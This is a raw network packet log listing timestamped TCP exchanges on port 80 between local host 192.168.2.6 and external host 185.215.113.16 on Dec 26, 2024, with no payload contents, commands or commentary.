Dec 26, 2024 12:41:41.897088051 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.897871971 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.897979021 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.898041010 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.898730993 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.898859978 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.898951054 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.899648905 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.899744987 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.899872065 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.900513887 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.900672913 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.900721073 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.901420116 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.901540041 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.902348995 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.902395964 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.902410030 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.902455091 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.903222084 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.903296947 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.903345108 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.904074907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.904175997 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.904309988 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.905040026 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.905108929 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.905158997 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.905853033 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.905920982 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.906053066 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.906728029 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.906801939 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.906847954 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.907635927 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.908180952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.908225060 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.908541918 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.908554077 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.908593893 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.909609079 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.909694910 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.909746885 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.910289049 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.910459995 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.910619974 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.911135912 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.911238909 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.911360025 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.912116051 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.912127972 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.912166119 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.912978888 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.913086891 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.913353920 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.913850069 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.913974047 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.914021015 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.914709091 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.914829969 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.914885998 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.915692091 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.915730953 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.915776968 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.916547060 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.916677952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.916727066 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.917437077 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.917510986 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.917555094 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.918328047 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.918479919 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.918606997 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.919256926 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.919269085 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.919308901 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.920111895 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.920296907 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.920346022 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.921046019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.921101093 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.921149969 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.921902895 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.922065973 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.922204018 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.922230005 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.922768116 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.922878027 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.923069000 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.923605919 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:41.973890066 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:41.987865925 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.087301970 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.087426901 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.087480068 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.087744951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.087929964 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.087980986 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.088078022 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.088821888 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.088866949 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.088938951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.089739084 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.089792967 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.089795113 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.090626955 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.090677977 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.090711117 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.091531038 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.091604948 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.091653109 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.092367887 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.092417955 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.092449903 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.093276978 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.093327045 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.093350887 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.094185114 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.094232082 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.094264030 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.095053911 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.095083952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.095132113 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.095901012 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.096018076 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.096090078 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.096837044 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.096927881 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.096946955 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.097711086 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.097764969 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.097856045 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.098598957 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.098654032 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.098722935 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.099472046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.099523067 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.099617004 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.100374937 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.100476980 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.100481033 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.101270914 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.101329088 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.101336956 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.102288961 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.102339983 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.102546930 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.103101015 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.103154898 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.103230000 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.103914976 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.104048014 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.104059935 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.104808092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.104859114 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.104892015 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.105739117 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.105770111 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.105869055 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.106580019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.106628895 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.106718063 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.107467890 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.107582092 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.107633114 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.108403921 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.108449936 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.108529091 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.109283924 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.109333038 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.109376907 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.110121965 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.110177994 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.110234022 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.111040115 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.111129045 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.111149073 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.111929893 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.111984015 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.112071037 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.112963915 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.113028049 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.113048077 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.113732100 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.113776922 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.113786936 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.114607096 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.114732027 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.114739895 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.115461111 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.115508080 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.115540028 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.116338968 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.116389990 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.116405964 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.117254972 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.117305040 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.117337942 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.118313074 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.118396997 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.118469000 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.119077921 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.119091034 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.119127035 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.119715929 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.119914055 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.119966984 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.120028019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.120846987 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.120913982 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.120964050 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.121700048 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.121747971 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.121781111 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.122603893 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.122653961 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.122709036 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.123492956 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.123552084 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.123574972 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.124334097 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.124385118 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.124452114 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.125248909 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.125302076 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.125330925 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.126127958 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.126184940 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.126220942 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.127054930 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.127109051 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.127156973 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.127913952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.127960920 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.128010988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.128798008 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.128844023 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.128906965 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.129739046 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.129789114 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.129810095 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.130579948 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.130686045 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.130690098 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.131515026 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.131567001 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.131629944 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.132144928 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.132342100 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.132396936 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.132443905 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.133261919 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.133307934 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.133353949 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.187146902 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.298894882 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.298913002 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.298924923 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.298950911 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.298980951 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.299032927 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.299174070 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.299484968 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.299530983 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.300098896 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.300250053 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.300307989 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.300753117 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.300951958 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.301007986 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.301579952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.301594019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.301639080 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.302675009 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.302841902 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.302901030 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.303721905 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.303736925 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.303796053 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.304547071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.304713964 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.305376053 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.305388927 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.305438995 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.306147099 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.306452036 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.306984901 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.307046890 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.307142019 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.307184935 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.307840109 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.308031082 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.308885098 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.308900118 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.308983088 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.309562922 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.309710979 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.310561895 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.310591936 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.310621977 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.310672998 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.311458111 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.311548948 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.311603069 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.312253952 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.312580109 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.313242912 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.313297033 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.313400984 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.313446999 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.314445972 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.314462900 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.314512968 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.314991951 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.315169096 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.315218925 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.315825939 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.315994024 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.316045046 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.316934109 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.317096949 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.317445993 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.317806959 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.317995071 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.318151951 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.318588018 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.318763971 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.318820953 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.319453001 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.319576979 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.319650888 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.320137024 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.320152998 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.320214987 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.321722984 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.321886063 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.321943998 CET	49784	80	192.168.2.6	185.215.113.16
Dec 26, 2024 12:41:42.322675943 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.322813988 CET	80	49784	185.215.113.16	192.168.2.6
Dec 26, 2024 12:41:42.322870016 CET	49784	80	192.168.2.6	185.215.113.16
